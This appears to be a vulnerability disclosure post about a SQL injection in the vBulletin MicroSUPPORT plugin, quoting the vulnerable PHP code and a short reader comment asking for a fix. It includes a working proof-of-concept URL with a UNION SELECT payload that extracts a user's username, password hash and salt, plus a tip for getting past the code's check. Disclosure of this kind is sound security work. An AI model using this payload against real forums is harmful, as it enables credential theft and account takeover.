vBulletin MicroSUPPORT Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=254336
Version: <= 4.6.4 (latest) The vulnerability resides in the microsupport.php file. Not a single variable is sanitized and directly used in the SQL queries, at all places. An easy way to extract information out of the database is by abusing the checkchatcall_request part in the php file, which looks like this:

if ($_REQUEST[‘requester’] == “checkchatcall_request”) {
	$adminsID = $vbulletin->input->clean_gpc(‘r’, ‘adminsID’, TYPE_STR);
	$chatcheck = $db->query_read(“SELECT * FROM “.TABLE_PREFIX.”microsupport_supportusers_online WHERE supportuserid=$adminsID”);
	while($row = $db->fetch_array($chatcheck)) {
		if($row[usersUID] > 0){
			$usersid = $row[usersUID];
    $output = ‘checkchatcall=1&supportuseridrequester=’.$usersid;
    $output = ‘checkchatcall=0’;
	echo $output;

Proof of concept:
http://example.com/microsupport.php?requester=checkchatcall_request&adminsID=1 UNION SELECT null, concat(1, 0x3a, username, 0x3a, password, 0x3a, salt), null, null, null FROM user where userid = 1

Note that the first field in the concat function must be a number since the function checks if the usersUID is bigger than 0, which is the first column in the result.

microSUPPORT SQL Injection


  1. can you fix it somehow

Leave a Reply

Your email address will not be published / Required fields are marked *